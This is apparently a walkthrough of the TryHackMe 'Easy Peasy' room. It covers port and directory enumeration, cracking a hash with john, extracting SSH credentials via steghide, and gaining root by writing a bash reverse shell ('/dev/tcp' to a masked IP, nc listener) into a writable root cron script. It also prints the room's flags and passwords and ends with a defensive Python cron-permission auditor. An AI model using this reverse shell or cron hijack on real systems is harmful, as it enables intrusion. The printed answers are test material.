THM — Easy Peasy

Enumeration through nmap

nmap -p- -A 10.10.107.122

How many ports are open?

What is the version of nginx?

What is running on the highest port?

Compromising the Machine

Using GoBuster, find flag 1.

dirb http://10.10.107.122

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Sep 23 20:40:33 2021
URL_BASE: http://10.10.107.122/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.107.122/ ----
==> DIRECTORY: http://10.10.107.122/hidden/
+ http://10.10.107.122/index.html (CODE:200|SIZE:612)
+ http://10.10.107.122/robots.txt (CODE:200|SIZE:43)

---- Entering directory: http://10.10.107.122/hidden/ ----
+ http://10.10.107.122/hidden/index.html (CODE:200|SIZE:390)
==> DIRECTORY: http://10.10.107.122/hidden/whatever/

---- Entering directory: http://10.10.107.122/hidden/whatever/ ----
+ http://10.10.107.122/hidden/whatever/index.html (CODE:200|SIZE:435)

-----------------
END_TIME: Thu Sep 23 20:40:40 2021
DOWNLOADED: 13836 - FOUND: 4

Further enumerate the machine, what is flag 2?

Crack the hash with easypeasy.txt. What is flag 3?

What is the hidden directory?

Using the wordlist provided to you in this task, crack the hash. What is the password?

john --format=gost --wordlist=/root/Desktop/easypeasy.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2021-09-23 22:08) 50.00g/s 384000p/s 384000c/s 384000C/s mypasswordforthatjob
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

What is the password to login to the machine via SSH?

steghide extract -sf image.jpg 
Enter passphrase:
wrote extracted data to "secrettext.txt".
root@ip-10-10-32-53:~/Desktop# cat secrettext.txt
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
iconvertedmypasswordtobinary

What is the user flag?

boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
flag{n0wits33msn0rm4l}

What is the root flag?

scp -P 6498 linpeas.sh boring@10.10.107.122:/tmp/
nano .mysecretcronjob.sh 
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
#!/bin/bash
# i will run as root
bash -i >& /dev/tcp/**.**.**.**/4444 0>&1
nc -lvnp 4444
cat .root.txt
flag{63a9f0ea7bb98050796b649e85481845}
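The root step works because a root cron job executes a script that the low-privileged user can edit. As an added example (not part of the original writeup), the following Python audits an /etc/crontab-style file for that misconfiguration: every entry whose script, or the directory holding it, is owned by someone other than root or is group/world-writable. The crontab sample is constructed, and the hidden script path is taken from the writeup; the real room's crontab is not shown on the page.

```python
import os
import shlex
import stat

# Constructed /etc/crontab-style sample; the entries are hypothetical, not the room's real crontab.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# m h dom mon dow user  command
* * * * * root /var/www/.mysecretcronjob.sh
0 3 * * * root /usr/bin/apt-get update
"""
INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}

def parse_system_crontab(text):
    """Yield (user, command) pairs; comments, blank lines and VAR=value lines are skipped."""
    for line in (l.strip() for l in text.splitlines()):
        fields = line.split(None, 6)  # 5 time fields, user, then the rest is the command
        if len(fields) == 7 and not line.startswith("#") and "=" not in fields[0]:
            yield fields[5], fields[6]

def script_path(command):
    """Path the entry executes: the first token, or the next one after an interpreter."""
    tokens = shlex.split(command)
    skip = 1 if tokens and os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1 else 0
    return tokens[skip] if tokens else None

def weak_permissions(path, trusted_uid=0, lstat=os.lstat):
    """Reasons a user other than trusted_uid could change what runs from this path."""
    reasons = []
    for label, p in (("script", path), ("directory", os.path.dirname(path))):
        try:
            st = lstat(p)
        except FileNotFoundError:
            reasons.append(f"{label} {p} does not exist")
            continue
        if st.st_uid != trusted_uid:
            reasons.append(f"{label} {p} owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):  # group or world write bit set
            reasons.append(f"{label} {p} is group/world-writable")
    return reasons

def audit(crontab_text, trusted_uid=0, lstat=os.lstat):
    """Return [(cron_user, path, reasons)] for entries another user could hijack."""
    findings = []
    for cron_user, command in parse_system_crontab(crontab_text):
        path = script_path(command)
        reasons = weak_permissions(path, trusted_uid, lstat) if path and os.path.isabs(path) else []
        if reasons:
            findings.append((cron_user, path, reasons))
    return findings
```

Run `audit(open("/etc/crontab").read())` on a live host to list the entries worth fixing; the `lstat` parameter exists so the check can be exercised against a fake tree without touching the filesystem.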
